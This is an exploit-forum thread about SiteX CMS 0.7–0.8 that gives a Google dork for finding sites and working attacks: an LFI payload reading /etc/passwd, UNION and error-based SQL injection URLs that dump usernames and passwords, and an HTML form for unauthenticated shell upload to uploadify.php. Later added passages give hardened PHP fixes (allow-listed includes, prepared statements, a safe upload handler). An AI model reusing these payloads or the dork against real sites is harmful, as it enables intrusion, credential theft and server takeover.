View Full Version : SiteX Vulnerability Review
Iceangel_
15.04.2009, 12:56
SiteX 0.7 Beta vulnerabilities
download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip
dork: "Powered by SiteX 0.7 Beta"
(don't post more than 10 links from the Google results ;) )
1) [LFI] (requirements: magic_quotes=off, register_globals=on)
/themes/Corporate/homepage.php
vulnerable code:
include("themes/$THEME_FOLDER/header.php");
exploitation:
/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%00
2) [SQL injection] (requirements: magic_quotes=off, register_globals=on)
links.php
vulnerable code:
if($category)
{
    $query = "SELECT * FROM $DB_Links_Groups WHERE id='$category'";
    $result = mysql_query($query, $Link) or queryError("8", mysql_error());
exploitation:
/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+
P.S.:
a shell uploads from the admin panel without any problems
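The LFI in item 1 exists because a request-controlled variable is interpolated straight into include(). The following is an added example written for this thread (it is not SiteX code and not the poster's); it shows how the theme selection would look if the theme name were checked against the directories actually installed under themes/ instead of being trusted. The themes/<name>/header.php layout is taken from the post; THEMES_ROOT and resolveThemeHeader() are names chosen here.

```php
<?php
// Added example (not SiteX code): choose the theme directory from an allow-list
// instead of interpolating a request-controlled variable into include().
// Assumes the themes/<name>/header.php layout quoted in the post.

declare(strict_types=1);

const THEMES_ROOT = __DIR__ . '/themes';   // hypothetical location

/**
 * Return the canonical path of the theme header, or null if the requested
 * theme is not an installed theme directory. The raw string is never used
 * to build a path that reaches include().
 */
function resolveThemeHeader(string $requested): ?string
{
    // 1. Syntactic allow-list: one path segment of letters, digits, '-' and '_'.
    //    This rejects "../", "/", "\0" and the %00 truncation trick.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Semantic allow-list: the name must be an existing subdirectory of
    //    THEMES_ROOT; the filesystem listing, not the request, is authoritative.
    $installed = array_filter(
        scandir(THEMES_ROOT) ?: [],
        fn($d) => $d !== '.' && $d !== '..' && is_dir(THEMES_ROOT . '/' . $d)
    );
    if (!in_array($requested, $installed, true)) {
        return null;
    }

    // 3. Defense in depth: the resolved file must still live under THEMES_ROOT.
    $header = realpath(THEMES_ROOT . '/' . $requested . '/header.php');
    $root   = realpath(THEMES_ROOT);
    if ($header === false || $root === false
        || strncmp($header, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $header;
}

// Read the value from an explicit source ($_GET here; in practice the site's
// config), never from a register_globals-style bare variable.
$theme  = (string)($_GET['THEME_FOLDER'] ?? 'Corporate');
$header = resolveThemeHeader($theme);

if ($header === null) {
    http_response_code(400);
    exit('Unknown theme');
}
include $header;
```

Step 2 is what makes the check robust: even with register_globals=on and magic_quotes=off, a value that is not the name of an installed theme directory never reaches include(). Turning register_globals off (and later removing the dependency on it entirely) removes the root cause.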
geezer.code
15.04.2009, 13:44
1) [LFI] requirements: magic_quotes=off is not required ;)
Iceangel_
15.04.2009, 13:54
To geezer.code:
it can't be made to work on every site, so I listed it as a requirement =)
[x60]unu
25.02.2010, 18:26
SiteX 0.7 Beta vulnerabilities
Product : SiteX 0.7.4 build 405
PHPinfo
http://localhost/setup/phpinfo.php
LFI
include("themes/$THEME_FOLDER/header.php");
magic_quotes=off
register_globals=on
results:
http://localhost//themes/Fusion/homepage.php?THEME_FOLDER=../../../[...]%00
http://localhost//themes/Joombo/homepage.php?THEME_FOLDER=../../../[...]%00
http://localhost//themes/Streamline/homepage.php?THEME_FOLDER=../../../[...]%00
http://localhost//themes/Structure/homepage.php?THEME_FOLDER=../../../[...]%00
SQL Injection
magic_quotes=off, register_globals=on
photo.php
$query = "SELECT * FROM $DB_Photos WHERE id='$photoid'";
$result = mysql_query($query, $Link) or queryError("11", mysql_error());
$sxPhoto = mysql_fetch_object($result);
$sxNewViews = $sxPhoto->views + 1;
$sxQuery2 = "UPDATE $DB_Photos SET views='$sxNewViews' WHERE id='$photoid'";
$sxResult2 = mysql_query($sxQuery2, $Link) or queryError("10", mysql_error());
$queryA = "SELECT * FROM $DB_Photos_Albums WHERE id='$albumid'";
$resultA = mysql_query($queryA, $Link) or queryError("12", mysql_error());
$ROWA = mysql_fetch_object($resultA);
result:
http://localhost/photo.php?photoid=4&albumid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
SQL injection in Admin Panel
magic_quotes=off, register_globals=on
admin/page_edit.php
    $result = mysql_query($query, $Link) or queryError("38", mysql_error());
    $query = "DELETE FROM $DB_Pages_Private WHERE pageid='$pageid'";
    $result = mysql_query($query, $Link) or queryError("38", mysql_error());
    if($private)
    {
        foreach ($user_types as $k => $v)
        {
            $query = "INSERT INTO $DB_Pages_Private (pageid, typeid) VALUES ('$pageid', '$k')";
            $result = mysql_query($query, $Link) or queryError("38", mysql_error());
        }
    }
    header("Location: ../page.php?pageid=$pageid&message=".str_replace(" ","_",$sxLang['MessagePageEdited']));
    die();
}
$query = "SELECT * FROM $DB_Pages WHERE id='$pageid'";
result:
http://localhost/admin/page_edit.php?pageid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7--+
admin/journal_edit.php
    $query = "UPDATE $DB_Journal SET title='$title', entry='$content', timestamp='$timestamp', month='$date_month', day='$date_day', year='$date_year' WHERE id='$entryid'";
    $result = mysql_query($query, $Link) or queryError("21", mysql_error());
    writeRSSXML();
    header("Location: ../journal.php?sxEntryID=$entryid&message=".str_replace(" ","_",$sxLang['MessageJournalEdited']));
    die();
    //$message = $sxLang['MessageJournalEdited'];
}
$query = "SELECT * FROM $DB_Journal WHERE id='$entryid'";
$result = mysql_query($query, $Link) or queryError("21", mysql_error());
$ROW = mysql_fetch_object($result);
result:
http://localhost/admin/journal_edit.php?entryid=1'+and+1=0+union+all+select+1,version(),3,4,5,6,7,8--+
.:[melkiy]:.
25.02.2010, 22:11
My two cents..)
-------
1) SQL injection (requirements: mq=off, any account)
file: /admin/profile_view.php
$query2 = "SELECT * FROM $DB_Users, $DB_Users_Assoc, $DB_Users_Types
           WHERE $DB_Users.username='$user' AND
           $DB_Users.id=$DB_Users_Assoc.userid AND
           $DB_Users_Assoc.typeid=$DB_Users_Types.id";
$result2 = mysql_query($query2, $Link) or queryError("402", mysql_error());
result:
/admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
2) blind SQL injection (requirements: mq=off, preferably a 5.x branch of the DB)
file: /forums_topic.php
$query = "SELECT * FROM $DB_Forums_Posts WHERE id='$topicid'";
$result = mysql_query($query, $Link) or queryError("71", mysql_error());
result:
/forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+
// lots of SQLi..
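Every injection quoted in this thread (links.php, photo.php, admin/page_edit.php, admin/journal_edit.php, admin/profile_view.php, forums_topic.php) has the same shape: a request value dropped into a single-quoted SQL literal and handed to mysql_query(). The block below is an added example written for this thread, not SiteX code; it rewrites the photo.php flow from the post above with mysqli prepared statements and adds the string-bound lookup that profile_view.php would need. It assumes $DB_Photos, $DB_Photos_Albums and $DB_Users come from trusted config (as in SiteX, not from the request), that $Link is a mysqli connection, and that mysqlnd is available for get_result(); run(), requireIntId(), loadPhoto() and findUserByName() are names chosen here.

```php
<?php
// Added example (not SiteX code): the photo.php flow quoted in the thread,
// rewritten so request values are bound as parameters and never become SQL text.
// Assumes: table names come from trusted config, $Link is a mysqli connection,
// and mysqlnd is available (needed for mysqli_stmt::get_result()).

declare(strict_types=1);

/** Table names cannot be bound, so they are checked against an identifier pattern. */
function assertIdentifier(string $name): void
{
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $name)) {
        throw new InvalidArgumentException('bad table name in config');
    }
}

/**
 * Coerce a request value to a positive integer id, or return null.
 * Rejects "1' and 1=0 union ...", "4abc", "", arrays and negative values.
 */
function requireIntId($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,9}\z/', $raw)) {
        return null;
    }
    return (int)$raw;
}

/** Prepare, bind and execute one statement; returns the first row or null. */
function run(mysqli $Link, string $sql, string $types, ...$params): ?array
{
    $stmt = $Link->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $Link->error);
    }
    $stmt->bind_param($types, ...$params);   // quoting is the driver's job
    $stmt->execute();
    $res = $stmt->get_result();              // false for UPDATE/DELETE
    $row = $res === false ? null : $res->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

/** photo.php: fetch photo, bump its counter, fetch album; ids bound as integers. */
function loadPhoto(mysqli $Link, string $DB_Photos, string $DB_Photos_Albums,
                   int $photoid, int $albumid): ?array
{
    assertIdentifier($DB_Photos);
    assertIdentifier($DB_Photos_Albums);

    $photo = run($Link, "SELECT * FROM `$DB_Photos` WHERE id = ?", 'i', $photoid);
    if ($photo === null) {
        return null;
    }
    // Increment in SQL instead of the read-modify-write in the original.
    run($Link, "UPDATE `$DB_Photos` SET views = views + 1 WHERE id = ?", 'i', $photoid);
    $album = run($Link, "SELECT * FROM `$DB_Photos_Albums` WHERE id = ?", 'i', $albumid);

    return ['photo' => $photo, 'album' => $album];
}

/** profile_view.php: a free-text username is bound as a string ('s'). */
function findUserByName(mysqli $Link, string $DB_Users, string $user): ?array
{
    assertIdentifier($DB_Users);
    return run($Link, "SELECT * FROM `$DB_Users` WHERE username = ?", 's', $user);
}

// Request handling: reject non-numeric ids before touching the database.
$photoid = requireIntId($_GET['photoid'] ?? null);
$albumid = requireIntId($_GET['albumid'] ?? null);
if ($photoid === null || $albumid === null) {
    http_response_code(400);
    exit('bad id');
}
// $Link = new mysqli(...);
// $data = loadPhoto($Link, $DB_Photos, $DB_Photos_Albums, $photoid, $albumid);
```

Two points worth noting for the other files in the thread: the magic_quotes "requirement" the posters keep listing disappears entirely with bound parameters, since the driver never interprets the value as SQL; and the admin-panel cases (page_edit.php, journal_edit.php) still need a real authorization check on top, because a bound query only prevents injection, not unauthorized edits.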
I'll make my modest contribution.
[Version 0.8.0 RC 3 build 524]
Shell upload. No privileges, no authentication, nothing else required.
File: includes/uploadify/uploadify.php
if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';
    $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name'];

    // $fileTypes = str_replace('*.','',$_REQUEST['fileext']);
    // $fileTypes = str_replace(';','|',$fileTypes);
    // $typesArray = split('\|',$fileTypes);
    // $fileParts = pathinfo($_FILES['Filedata']['name']);

    // if (in_array($fileParts['extension'],$typesArray)) {
        // Uncomment the following line if you want to make the directory if it doesn't exist
        // mkdir(str_replace('//','/',$targetPath), 0755, true);

        move_uploaded_file($tempFile,$targetFile);
        echo "1";
    // } else {
    //     echo 'Invalid file type.';
    // }
}
Target:
Exploit ^_^
<form enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="folder" />
</form>
And if the site admin uncomments the lines that are commented out by default, the allowed file extensions can be passed in the fileext parameter by writing .php into it.
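The uploadify.php handler quoted above has three independent defects: no authentication, a target directory built from the request's folder parameter (and even the extension allow-list, when enabled, is supplied by the client's fileext parameter), and the client-chosen filename written as-is. The following is an added example written for this thread, not Uploadify or SiteX code, showing a replacement that fixes all three. UPLOAD_ROOT, the $_SESSION['is_admin'] flag, resolveTargetDir() and storeUpload() are names chosen here; the Filedata field name and folder parameter are the ones from the post.

```php
<?php
// Added example (not Uploadify/SiteX code): a hardened replacement for the
// uploadify.php handler quoted in the thread. Assumes an authenticated admin
// session flag ($_SESSION['is_admin']) and a fixed upload root; both are
// hypothetical names chosen for this example.

declare(strict_types=1);

const UPLOAD_ROOT  = __DIR__ . '/uploads';           // fixed on the server, never from the request
const ALLOWED_EXT  = ['jpg', 'jpeg', 'png', 'gif'];   // server-side allow-list, not a fileext parameter
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];
const MAX_BYTES    = 5 * 1024 * 1024;

/** Resolve the request's subfolder to an existing directory under UPLOAD_ROOT, or null. */
function resolveTargetDir(string $folder): ?string
{
    // One or more simple segments only: no "..", no leading "/", no NUL bytes.
    if (!preg_match('#\A[A-Za-z0-9_-]+(/[A-Za-z0-9_-]+)*\z#', $folder)) {
        return null;
    }
    $root = realpath(UPLOAD_ROOT);
    $dir  = realpath(UPLOAD_ROOT . '/' . $folder);
    if ($root === false || $dir === false
        || strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;   // missing, or resolves outside the upload root
    }
    return $dir;
}

/** Validate one uploaded file and store it under a server-chosen name; throws on any failure. */
function storeUpload(array $file, string $dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Extension decided against the server's list; the client's list is ignored.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new RuntimeException('file type not allowed');
    }
    // Content check: the bytes must actually look like an allowed image type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_MIME, true)) {
        throw new RuntimeException('content does not match an allowed type');
    }
    // Random server-side name: the client's filename never reaches the filesystem.
    $dest = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);
    return $dest;
}

session_start();
if (empty($_SESSION['is_admin'])) {          // hypothetical auth flag: anonymous callers get nothing
    http_response_code(403);
    exit('0');
}
if (empty($_FILES['Filedata'])) {
    http_response_code(400);
    exit('0');
}
$dir = resolveTargetDir((string)($_POST['folder'] ?? ''));
if ($dir === null) {
    http_response_code(400);
    exit('0');
}
try {
    storeUpload($_FILES['Filedata'], $dir);
    echo '1';
} catch (RuntimeException $e) {
    http_response_code(400);
    echo '0';
}
```

Two configuration measures complete the picture regardless of handler code: script execution should be disabled for the upload directory at the web server (so a file that slips through is served as static content rather than run), and the folder parameter should be dropped from the request altogether where the application can derive it from the session or the calling page.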